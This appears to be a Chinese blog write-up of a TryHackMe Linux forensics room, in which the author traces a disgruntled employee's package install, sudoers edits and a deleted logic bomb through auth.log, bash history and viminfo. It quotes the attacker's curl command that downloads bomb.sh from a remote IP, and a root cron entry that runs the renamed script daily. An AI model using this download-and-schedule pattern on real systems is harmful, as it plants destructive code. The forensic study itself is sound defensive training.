当前位置: 首页 > news >正文

【THM】linux取证 DisGruntled

 

目录

0x00  房间介绍

0x01  连接并简单排查

0x02  让我们看看做没做坏事

0x03  炸弹已埋下。但何时何地?

0x04  收尾

 0x05   结论


0x00  房间介绍

嘿,孩子!太好了,你来了!
不知道您是否看过这则新闻,我们客户之一(Cyber​​T)的 IT 部门的一名员工被警方逮捕了。这 家伙正在兼职,成功开展 网络钓鱼行动
Cyber​​T 希望我们检查此人是否对他们的任何资产做过任何恶意的事情。准备好,喝杯咖啡,然后到会议室见我。

0x01  连接并简单排查

我们通过ssh连接到该机器

 查看两个任务,我们思考一下如何解决。

 我们知道auth.log文件记录了系统的日志信息,所以安装包的命令会在上面留下日志。

/var/log/auth.log 文件用于记录与系统认证和授权相关的日志信息。这包括:

  • 用户登录和注销事件
  • 使用 sudo 执行的命令
  • SSH 登录尝试
  • 系统服务(如 PAM)相关的认证事件

我们使用下面这段代码进行查询与sudo有关的日志查询。

sudo cat /var/log/auth.log | grep sudo

 最终我找到了这条命令,但是我复盘的时候发现,应该有更好用的命令。

因为是安装包的命令,肯定会有apt或者yum,所以我们再加入一个条件限制搜索结果。

sudo cat /var/log/auth.log | grep sudo | grep apt

这条命令就过滤的很简单。

同时同一行也有工作目录。

0x02  让我们看看做没做坏事

 首先创建用户必须是root或者sudo提权,并且linux添加用户的操作是useradd,根据此信息,我们编写一个脚本去终端中执行。

sudo cat /var/log/auth.log | grep adduser | grep sudo

 我的疑问:adduser,和useradd的区别,ai给出了很好的解释

 第二个问题,sudoer文件什么时候更新。

知识:编辑 /etc/sudoers 文件时会调用“visudo”。在日志中查找此命令。

sudo cat /var/log/auth.log | grep visudo

我们使用此命令查找到了文件更新时间。

第三个任务,我们可以知道使用了vi编辑器

/home/Viminfo 文件包含在 Vim 中打开的文件的命令行历史记录、搜索字符串历史记录等。

 很开门,但是没啥用,我们使用下面的命令直接得到编辑命令

sudo cat /var/log/auth.log | grep vi

0x03  炸弹已埋下。但何时何地?

bomb.sh 文件是一个巨大的危险信号! 虽然文件本身已经足以证明其有罪,但我们仍需要找出它的来源和内容。问题是该文件已不存在。

我们看看任务都有什么?

 上文我们已经得到了文件的路径,我随后跟进到这个目录,发现这个文件已经被删除。

我发现隐藏文件有一个.bash_history

/home/user/Bash_history 文件列出了除使用 sudo 运行的命令之外的所有命令,这些命令都存储在 bash 历史记录中。我们打开它,发现了有关恶意文件的信息。

 创建bomb.sh的命令,curl 10.10.158.38:8080/bomb.sh --output bomb.sh

指的是访问这个站点的sh文件并将它保存到本地

任务者提到了这个sh文件被移到了其他位置,但是没有被发现。

我们查看一下viminfo文件

/home/viminfo 文件包含在 Vim 中打开的文件的命令行历史记录、搜索字符串历史记录等。

 

对于vim编辑器来说:

  • : 开始了一个 Ex 命令。
  • saveas 是一个命令,用于保存编辑的内容到一个新文件

我们知道了它被移动的位置。

文件最后被修改的时间是一个问题,但是我找到了时间戳

date -d @1672208955

 我们可以使用这个命令将时间戳变成时间。

最后一个问题十分简单,我们直接访问那个文件,查看这个sh文件执行的命令就可以得出啦!

0x04  收尾

 我们知道这个文件被加入了定时任务中,我们去查看一下.

查看定时任务

cat /etc/crontab

0 8 * * * root /bin/os-update.sh

具体解释如下:

  • 0: 表示分钟,0 表示整点。
  • 8: 表示小时,8 表示上午 8 点。
  • *: 表示日(每个月的每天都会触发)。
  • *: 表示月(每年的每个月都会触发)。
  • *: 表示星期几(每周的每一天都会触发)。

表示在 每天的 8:00 AMroot 用户 执行 /bin/os-update.sh 脚本。 

0x05   结论

感谢您,现在我们知道了我们那位心怀不满的 IT 人员在计划什么。

我们知道,他在机器上下载了一个事先准备好的脚本,如果用户在过去 30 天内没有登录过这台机器,这个脚本就会删除已安装服务的所有文件。这绝对是“逻辑炸弹”的典型例子。

看看你,上班第二天,你就帮我解决了两个案子。告诉索菲,我让你涨工资了。

http://www.lryc.cn/news/481601.html

相关文章:

  • SpringBoot整合Freemarker(四)
  • centos docker 安装 rabbitmq
  • 手动实现promise的all,race,finally方法
  • H5移动端预览PDF方法
  • uniapp—android原生插件开发(1环境准备)
  • 《潜行者2切尔诺贝利之心》游戏引擎介绍
  • winform 加载 office excel 插入QRCode图片如何设定位置
  • 简易入手《SOM神经网络》的本质与原理
  • 21.assert断言
  • 15分钟学 Go 第 46 天 : 监控与日志
  • BFS 算法专题(四):多源 BFS
  • 基于Spring Boot+Vue的养老院管理系统【原创】
  • Linux screen和cscope工具使用总结
  • 深度学习面试八股汇总
  • 微服务架构面试内容整理-API 网关-Gateway
  • 22.04Ubuntu---ROS2使用rclcpp编写节点C++
  • XML 现实案例:深入解析与应用
  • Spring源码(十二):Spring MVC之Spring Boot
  • Kafka 之事务消息
  • 小菜家教平台(四):基于SpringBoot+Vue打造一站式学习管理系统
  • 解决 Vue3、Vite 和 TypeScript 开发环境下跨域的问题,实现前后端数据传递
  • 量化交易系统开发-实时行情自动化交易-3.3.数据采集流程
  • 探索PyAV:Python中的多媒体处理利器
  • SpringBoot源码解析(三):启动开始阶段
  • C# const与readonly关键字的区别
  • 【数据分享】1901-2023年我国省市县镇四级的逐年降水数据(免费获取/Shp/Excel格式)
  • hhdb数据库介绍(9-4)
  • 苍穹外卖的分层所用到的技术以及工具+jwt令牌流程图(jwt验证)
  • Python——数列1/2,2/3,3/4,···,n/(n+1)···的一般项为Xn=n/(n+1),当n—>∞时,判断数列{Xn}是否收敛
  • css:还是语法